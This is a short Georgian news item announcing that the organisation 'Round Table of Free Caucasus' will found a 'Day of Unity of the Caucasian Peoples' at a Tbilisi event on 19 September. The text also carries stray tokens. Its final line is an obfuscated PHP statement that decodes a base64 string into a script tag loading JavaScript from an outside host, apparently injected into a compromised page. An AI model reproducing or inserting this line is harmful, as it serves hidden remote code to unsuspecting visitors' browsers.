celsiusi
ავერსი შნაიდერი
კვირას, 19 სექტემბერს, ორგანიზაცია "მრგვალი მაგიდა თავისუფალი კავკასიის" ორგანიზატორობით, საქართველოში ფუძნდება "კავკასიის ერებთა ერთობის დღე" . 
 
ორგანიზატორების გადაწყვეტილებით, ეს დღე მომავალშიც ყოველწლიურად აღინიშნება საქართველოში.
 
ღონისძიებას დაესწრებიან  საქართველოს პირველი მოწვევის პარლამენტის წევრები, საქართველოს დამოუკიდებლობის აღდგენის აქტზე ხელმომწერები, ორგანიზაციის მხარდამჭერები და  ასევე, ყველა ის ადამიანი ვისაც სურვილი ექნება ღონისძიებაზე დასწრების. 
 
როგორც საინფორმაციო სააგენტო BUSINESS TIME-ს ერთერთმა ორგანიზატორმა განუცხადა, ღონისძიების ხანგრძლივობა იქნება ერთი საათი. ღონისძიების ორგანიზატორები სიტყვით მიმართავენ შეკრებილ აქტივისტებს და ამ დღის  დაფუძნებაზე,  სიმბოლურად ფურცელზე ხელს მოაწერენ დამსწრე ადამიანები სურვილისამებრ. 
 
ხელმოწერები შეინახება ორგანიზაცია "მრგვალი მაგიდა თავისუფალი კავკასიის" არქივში.
 
ღონისძიებაზე დასწრების მსურველებს შეეძლებათ  მიბრძანდნენ :  19 სექტემბერს  13:00 _ზე ქ. თბილისი რაიონი თემქა/ზღვა საქართველოს მატიანე.
 
1291
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");